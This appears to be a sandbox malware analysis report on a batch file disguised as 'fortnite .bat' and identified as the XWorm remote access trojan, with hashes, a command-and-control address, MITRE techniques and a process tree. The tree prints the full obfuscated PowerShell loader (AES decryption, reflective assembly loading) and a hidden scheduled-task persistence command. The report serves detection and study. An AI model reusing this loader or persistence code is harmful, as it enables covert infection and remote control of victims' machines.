xworm | 6c0f00683ba47c5fcaef71626aefb1b0ac6f006888a3611222db1052f8a05ffd

Analysis

max time kernel
91s
max time network
95s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
08-11-2024 06:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fortnite .bat
Size

571KB
MD5

73f587e1a81276175d5e6560e6d6b18c
SHA1

843d9c158c1942d8bd8348a36934cf9307aae7cc
SHA256

6c0f00683ba47c5fcaef71626aefb1b0ac6f006888a3611222db1052f8a05ffd
SHA512

ed1371fe6e1b9c4ee6a5797d25559c54c3d5709298f17fbd2b7ae472688f2cb6224d5a87ede31e565fe40731336a46db9bc0363b65859c64035117d5d3404bb6
SSDEEP

12288:RvkWtm4kNF0x6e2K2/SZAh9R5x3UEOM+2SoWDjsnlLOS6+7nkCzTdU8F+pptww9r:Uxo9I32QfMD

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

80.76.49.227:9999

Mutex

2G2GCFyKfM7BM0l4

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/940-43-0x00000212B3920000-0x00000212B392E000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm

Blocklisted process makes network request 2 IoCs

flow	pid	Process
1	940	powershell.exe
3	940	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
3664	powershell.exe
3484	powershell.exe
940	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
3608	timeout.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3587106988-279496464-3440778474-1000_Classes\Local Settings	powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
3664	powershell.exe
3664	powershell.exe
3484	powershell.exe
3484	powershell.exe
940	powershell.exe
940	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3664	powershell.exe
Token: SeDebugPrivilege	3484	powershell.exe
Token: SeIncreaseQuotaPrivilege	3484	powershell.exe
Token: SeSecurityPrivilege	3484	powershell.exe
Token: SeTakeOwnershipPrivilege	3484	powershell.exe
Token: SeLoadDriverPrivilege	3484	powershell.exe
Token: SeSystemProfilePrivilege	3484	powershell.exe
Token: SeSystemtimePrivilege	3484	powershell.exe
Token: SeProfSingleProcessPrivilege	3484	powershell.exe
Token: SeIncBasePriorityPrivilege	3484	powershell.exe
Token: SeCreatePagefilePrivilege	3484	powershell.exe
Token: SeBackupPrivilege	3484	powershell.exe
Token: SeRestorePrivilege	3484	powershell.exe
Token: SeShutdownPrivilege	3484	powershell.exe
Token: SeDebugPrivilege	3484	powershell.exe
Token: SeSystemEnvironmentPrivilege	3484	powershell.exe
Token: SeRemoteShutdownPrivilege	3484	powershell.exe
Token: SeUndockPrivilege	3484	powershell.exe
Token: SeManageVolumePrivilege	3484	powershell.exe
Token: 33	3484	powershell.exe
Token: 34	3484	powershell.exe
Token: 35	3484	powershell.exe
Token: 36	3484	powershell.exe
Token: SeIncreaseQuotaPrivilege	3484	powershell.exe
Token: SeSecurityPrivilege	3484	powershell.exe
Token: SeTakeOwnershipPrivilege	3484	powershell.exe
Token: SeLoadDriverPrivilege	3484	powershell.exe
Token: SeSystemProfilePrivilege	3484	powershell.exe
Token: SeSystemtimePrivilege	3484	powershell.exe
Token: SeProfSingleProcessPrivilege	3484	powershell.exe
Token: SeIncBasePriorityPrivilege	3484	powershell.exe
Token: SeCreatePagefilePrivilege	3484	powershell.exe
Token: SeBackupPrivilege	3484	powershell.exe
Token: SeRestorePrivilege	3484	powershell.exe
Token: SeShutdownPrivilege	3484	powershell.exe
Token: SeDebugPrivilege	3484	powershell.exe
Token: SeSystemEnvironmentPrivilege	3484	powershell.exe
Token: SeRemoteShutdownPrivilege	3484	powershell.exe
Token: SeUndockPrivilege	3484	powershell.exe
Token: SeManageVolumePrivilege	3484	powershell.exe
Token: 33	3484	powershell.exe
Token: 34	3484	powershell.exe
Token: 35	3484	powershell.exe
Token: 36	3484	powershell.exe
Token: SeIncreaseQuotaPrivilege	3484	powershell.exe
Token: SeSecurityPrivilege	3484	powershell.exe
Token: SeTakeOwnershipPrivilege	3484	powershell.exe
Token: SeLoadDriverPrivilege	3484	powershell.exe
Token: SeSystemProfilePrivilege	3484	powershell.exe
Token: SeSystemtimePrivilege	3484	powershell.exe
Token: SeProfSingleProcessPrivilege	3484	powershell.exe
Token: SeIncBasePriorityPrivilege	3484	powershell.exe
Token: SeCreatePagefilePrivilege	3484	powershell.exe
Token: SeBackupPrivilege	3484	powershell.exe
Token: SeRestorePrivilege	3484	powershell.exe
Token: SeShutdownPrivilege	3484	powershell.exe
Token: SeDebugPrivilege	3484	powershell.exe
Token: SeSystemEnvironmentPrivilege	3484	powershell.exe
Token: SeRemoteShutdownPrivilege	3484	powershell.exe
Token: SeUndockPrivilege	3484	powershell.exe
Token: SeManageVolumePrivilege	3484	powershell.exe
Token: 33	3484	powershell.exe
Token: 34	3484	powershell.exe
Token: 35	3484	powershell.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 2756 wrote to memory of 3600	2756	cmd.exe	78
PID 2756 wrote to memory of 3600	2756	cmd.exe	78
PID 3600 wrote to memory of 4128	3600	net.exe	79
PID 3600 wrote to memory of 4128	3600	net.exe	79
PID 2756 wrote to memory of 3664	2756	cmd.exe	80
PID 2756 wrote to memory of 3664	2756	cmd.exe	80
PID 3664 wrote to memory of 3484	3664	powershell.exe	82
PID 3664 wrote to memory of 3484	3664	powershell.exe	82
PID 3664 wrote to memory of 4024	3664	powershell.exe	84
PID 3664 wrote to memory of 4024	3664	powershell.exe	84
PID 4024 wrote to memory of 1420	4024	WScript.exe	85
PID 4024 wrote to memory of 1420	4024	WScript.exe	85
PID 1420 wrote to memory of 2848	1420	cmd.exe	87
PID 1420 wrote to memory of 2848	1420	cmd.exe	87
PID 2848 wrote to memory of 1884	2848	net.exe	88
PID 2848 wrote to memory of 1884	2848	net.exe	88
PID 1420 wrote to memory of 940	1420	cmd.exe	89
PID 1420 wrote to memory of 940	1420	cmd.exe	89
PID 940 wrote to memory of 2524	940	powershell.exe	90
PID 940 wrote to memory of 2524	940	powershell.exe	90
PID 2524 wrote to memory of 3608	2524	cmd.exe	92
PID 2524 wrote to memory of 3608	2524	cmd.exe	92

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\fortnite .bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2756
- C:\Windows\system32\net.exe
  net file
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3600
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 file
    3⤵
    PID:4128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iJHn1mpGvhgI+DotLrS5NbtrLj72BaXKNRV/TmxQRBI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kXScYF4z//tI9MSHPpTdUg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KRBnU=New-Object System.IO.MemoryStream(,$param_var); $ZOvqK=New-Object System.IO.MemoryStream; $MyezJ=New-Object System.IO.Compression.GZipStream($KRBnU, [IO.Compression.CompressionMode]::Decompress); $MyezJ.CopyTo($ZOvqK); $MyezJ.Dispose(); $KRBnU.Dispose(); $ZOvqK.Dispose(); $ZOvqK.ToArray();}function execute_function($param_var,$param2_var){ $IMvGp=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MJtdD=$IMvGp.EntryPoint; $MJtdD.Invoke($null, $param2_var);}$IkjIR = 'C:\Users\Admin\AppData\Local\Temp\fortnite .bat';$host.UI.RawUI.WindowTitle = $IkjIR;$PmYzy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IkjIR).Split([Environment]::NewLine);foreach ($LHlfd in $PmYzy) { if ($LHlfd.StartsWith(':: ')) { $DAvow=$LHlfd.Substring(3); break; }}$payloads_var=[string[]]$DAvow.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3664
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_65_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_65.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3484
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_65.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4024
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_65.bat" "
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1420
    - - C:\Windows\system32\net.exe
        
        net file
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2848
      - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        6⤵
        
        PID:1884
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iJHn1mpGvhgI+DotLrS5NbtrLj72BaXKNRV/TmxQRBI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('kXScYF4z//tI9MSHPpTdUg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KRBnU=New-Object System.IO.MemoryStream(,$param_var); $ZOvqK=New-Object System.IO.MemoryStream; $MyezJ=New-Object System.IO.Compression.GZipStream($KRBnU, [IO.Compression.CompressionMode]::Decompress); $MyezJ.CopyTo($ZOvqK); $MyezJ.Dispose(); $KRBnU.Dispose(); $ZOvqK.Dispose(); $ZOvqK.ToArray();}function execute_function($param_var,$param2_var){ $IMvGp=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $MJtdD=$IMvGp.EntryPoint; $MJtdD.Invoke($null, $param2_var);}$IkjIR = 'C:\Users\Admin\AppData\Roaming\startup_str_65.bat';$host.UI.RawUI.WindowTitle = $IkjIR;$PmYzy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($IkjIR).Split([Environment]::NewLine);foreach ($LHlfd in $PmYzy) { if ($LHlfd.StartsWith(':: ')) { $DAvow=$LHlfd.Substring(3); break; }}$payloads_var=[string[]]$DAvow.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:940
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp90F0.tmp.bat""
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:2524
        
        C:\Windows\system32\timeout.exe
        
        timeout 3
        7⤵
        Delays execution with timeout.exe
        
        PID:3608

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
df472dcddb36aa24247f8c8d8a517bd7

SHA1
6f54967355e507294cbc86662a6fbeedac9d7030

SHA256
e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6

SHA512
06383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6ed6547d270ec2a3219183bfa73bc09b

SHA1
efbcbdbdccab903a79b2b0a65d882eca8bb81363

SHA256
f7511aa08a289c57af48cfffb1361623c47df6324b80f94841ba69c9497f9ac2

SHA512
d396cd37f446f9798dcd60229f0c2f55a4bdc0541149dea4be51236e7d91bc65f2bf9eee8327beafc3fe387dded9c3cc049e2101137e73956194e88939a7ec72

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2rkxffyw.czf.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp90F0.tmp.bat

Filesize
171B

MD5
eaada82113e10ac79f206e70fd5f7b63

SHA1
fc4ea6258e8ee0af985a785a5e729645f75422ea

SHA256
a30916882239394ca58ddbefe2768fba17487ae3b4f9d0228020be64b644b37d

SHA512
0c49627674e8651f20c74b0566da8cb980be43089ace9612361fc805935aed98c91899e8fb06530fd97e0d303ec01296f1efdbe3261d5d52d8bf08c00bb5873b

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_65.bat

Filesize
571KB

MD5
73f587e1a81276175d5e6560e6d6b18c

SHA1
843d9c158c1942d8bd8348a36934cf9307aae7cc

SHA256
6c0f00683ba47c5fcaef71626aefb1b0ac6f006888a3611222db1052f8a05ffd

SHA512
ed1371fe6e1b9c4ee6a5797d25559c54c3d5709298f17fbd2b7ae472688f2cb6224d5a87ede31e565fe40731336a46db9bc0363b65859c64035117d5d3404bb6

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_65.vbs

Filesize
114B

MD5
8018bd4f8da9af9c26266b1f8cb958ef

SHA1
719763b65b0cb4342b10756627018d7ecaee4e91

SHA256
dcbeb2590eea589ceed20dfe83e5c96edf99b1c14a3eac427ab0484b0e041b6e

SHA512
12521d804d977e056aa36c1b3cb5ec51d82fc061db2d6921aefaa7350f3ffd15745726c85593316833a8989fc54d9496359fe041b2c39b30c379737cc4f3b275

Download Submit
memory/940-43-0x00000212B3920000-0x00000212B392E000-memory.dmp

Filesize
56KB

Download
memory/940-45-0x00000212B38A0000-0x00000212B38AC000-memory.dmp

Filesize
48KB

Download
memory/3664-14-0x00000294A56C0000-0x00000294A56F2000-memory.dmp

Filesize
200KB

Download
memory/3664-13-0x00000294A53F0000-0x00000294A53F8000-memory.dmp

Filesize
32KB

Download
memory/3664-12-0x00007FFE47C30000-0x00007FFE486F2000-memory.dmp

Filesize
10.8MB

Download
memory/3664-11-0x00007FFE47C30000-0x00007FFE486F2000-memory.dmp

Filesize
10.8MB

Download
memory/3664-10-0x00007FFE47C30000-0x00007FFE486F2000-memory.dmp

Filesize
10.8MB

Download
memory/3664-0-0x00007FFE47C33000-0x00007FFE47C35000-memory.dmp

Filesize
8KB

Download
memory/3664-44-0x00007FFE47C30000-0x00007FFE486F2000-memory.dmp

Filesize
10.8MB

Download
memory/3664-9-0x00000294A5400000-0x00000294A5422000-memory.dmp

Filesize
136KB

Download